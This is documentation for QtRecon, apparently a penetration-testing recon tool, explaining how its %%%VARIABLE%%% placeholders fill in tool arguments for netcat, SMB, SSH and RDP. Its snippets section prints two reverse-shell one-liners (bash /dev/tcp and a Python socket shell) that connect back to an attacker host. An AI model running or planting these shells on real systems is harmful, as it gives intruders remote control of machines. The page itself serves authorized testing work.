Skip to main content
QtRecon supports dynamic variable substitution in tool arguments, allowing you to create flexible tool configurations that adapt to the current reconnaissance context.

How variables work

Variables use the %%%VARIABLE_NAME%%% syntax in tool argument definitions. When a tool is launched, QtRecon automatically replaces these placeholders with actual values from the current context.

Example

"netcat": {
  "name": "Netcat",
  "binary": "/usr/bin/ncat",
  "args": ["-nv", "%%%IP%%%", "%%%PORT%%%"]
}
When launched against 192.168.1.100:80, this becomes: 
/usr/bin/ncat -nv 192.168.1.100 80

Built-in variables

QtRecon provides several built-in variables that are automatically populated based on the scan context.

Network variables

%%%IP%%%
string
The target IP address being scannedExample: 192.168.1.100
%%%PORT%%%
string
The specific port number for the current contextExample: 443
%%%PROTO%%%
string
The protocol (automatically determined based on port)Values: http or httpsExample: https for port 443
%%%HOSTNAME%%%
string
The hostname of the target (if resolved)Example: webserver.example.com

Authentication variables

%%%USERNAME%%%
string
Username for authenticated operationsExample: administrator
%%%PASSWORD%%%
string
Password for authenticated operationsExample: P@ssw0rd123
%%%HASH%%%
string
Password hash for pass-the-hash attacksExample: aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
%%%SSH_KEY%%%
string
Path to SSH private key fileExample: /home/user/.ssh/id_rsa
%%%DOMAIN%%%
string
Domain name for Active Directory environmentsExample: CORP

Attacker variables

%%%LHOST%%%
string
Local host IP address (attacker machine)Automatically determined from preferred_interfaces in user_prefsExample: 10.10.14.5
%%%LPORT%%%
string
Local port for reverse connectionsDefaults to value in user_prefs.preferred_lportExample: 8444

Custom variables

Define your own variables in the user_variables section of the configuration file: 
"user_variables": {
  "XFREERDP_KEYBOARD": "0x0000040C",
  "WORDLIST_DIR": "/usr/share/wordlists",
  "CUSTOM_TIMEOUT": "30"
}
Then reference them in tool configurations: 
"xfreerdp": {
  "name": "xfreerdp",
  "binary": "/usr/bin/xfreerdp",
  "args": [
    "/v:%%%IP%%%",
    "/kbd:%%%XFREERDP_KEYBOARD%%%"
  ]
}

Custom variable example: Keyboard layout

The XFREERDP_KEYBOARD variable is particularly useful for RDP connections: 
"user_variables": {
  "XFREERDP_KEYBOARD": "0x0000040C"
}
Common keyboard layouts:
  • 0x00000409 - US English
  • 0x0000040C - French
  • 0x00000407 - German
  • 0x00000809 - UK English
  • 0x0000040A - Spanish

Variable usage examples

Web application testing

Combine multiple variables for comprehensive web scanning: 
"feroxbuster": {
  "name": "feroxbuster",
  "binary": "/usr/bin/feroxbuster",
  "args": [
    "--url", "%%%PROTO%%%://%%%IP%%%:%%%PORT%%%/",
    "-w", "/usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-directories.txt"
  ]
}

Authenticated SMB enumeration

Use authentication variables for Windows enumeration: 
"smb_script_authenticated": {
  "name": "SMB authenticated enum",
  "binary": "/bin/bash",
  "args": [
    "scripts/smb.sh",
    "%%%IP%%%",
    "%%%DOMAIN%%%",
    "%%%USERNAME%%%",
    "%%%PASSWORD%%%"
  ]
}

SSH with key authentication

"ssh_key": {
  "name": "SSH (key auth)",
  "binary": "/usr/bin/ssh",
  "in_terminal": true,
  "detached": true,
  "args": [
    "-i", "%%%SSH_KEY%%%",
    "%%%USERNAME%%%@%%%IP%%%"
  ]
}

RDP with credentials

"xfreerdp": {
  "name": "xfreerdp",
  "binary": "/usr/bin/xfreerdp",
  "detached": true,
  "args": [
    "/v:%%%IP%%%",
    "/d:%%%DOMAIN%%%",
    "/u:%%%USERNAME%%%",
    "/p:%%%PASSWORD%%%",
    "/cert:ignore",
    "/drive:tmp,/tmp",
    "/dynamic-resolution",
    "/kbd:%%%XFREERDP_KEYBOARD%%%"
  ]
}

Reverse shell snippets

Variables are also used in the snippets section: 
bash -i >& /dev/tcp/%%%LHOST%%%/%%%LPORT%%% 0>&1

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%%%LHOST%%%",%%%LPORT%%%));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

Configuring LHOST and LPORT

The %%%LHOST%%% and %%%LPORT%%% variables are configured through user_prefs: 
"user_prefs": {
  "preferred_interfaces": ["tun0", "vpn0", "eth0"],
  "preferred_lport": 8444
}
preferred_interfaces
array
List of network interfaces in priority order. QtRecon uses the first available interface to determine %%%LHOST%%%.
preferred_lport
number
Default local port for reverse connections (%%%LPORT%%%).
Put VPN interfaces like tun0 first in preferred_interfaces to ensure reverse shells connect through your VPN during penetration tests.

Variable resolution behavior

If a variable cannot be resolved (e.g., %%%USERNAME%%% when no username is set), QtRecon typically:
  • Prompts you to enter the value before launching the tool
  • Or leaves the variable as-is if the tool has "edit_before_launch": true
%%%PROTO%%% is automatically determined:
  • Port 443, 8443: https
  • Port 80, 8080, 8000: http
  • Other ports: defaults to http
Variable names are case-sensitive. Use uppercase: %%%IP%%% not %%%ip%%%
Custom variables in user_variables can override built-in variables if they use the same name (not recommended).

Best practices

Choose clear, uppercase names for custom variables:
"SECLISTS_PATH": "/usr/share/wordlists/SecLists"
Before relying on variables, test the resulting command manually to ensure proper substitution:
# Test what QtRecon will execute
/usr/bin/ncat -nv 192.168.1.100 80
Add comments (if your JSON parser supports them) or maintain separate documentation for custom variables.
When using variables in custom shell scripts, quote them to handle special characters:
#!/bin/bash
target="$1"  # %%%IP%%%
port="$2"    # %%%PORT%%%

Complete example

Here’s a tool configuration demonstrating multiple variable types: 
"user_variables": {
  "XFREERDP_KEYBOARD": "0x0000040C",
  "RDP_RESOLUTION": "1920x1080"
},
"user_binaries": {
  "xfreerdp_full": {
    "name": "xfreerdp (full)",
    "text": "Connect to RDP with full options",
    "binary": "/usr/bin/xfreerdp",
    "detached": true,
    "args": [
      "/v:%%%IP%%%:%%%PORT%%%",
      "/d:%%%DOMAIN%%%",
      "/u:%%%USERNAME%%%",
      "/p:%%%PASSWORD%%%",
      "/cert:ignore",
      "/drive:shared,/tmp",
      "/size:%%%RDP_RESOLUTION%%%",
      "/kbd:%%%XFREERDP_KEYBOARD%%%",
      "+clipboard"
    ]
  }
}

Next steps

Tool setup

Learn how to configure tools that use variables

Autorun rules

Use variables in automated tool execution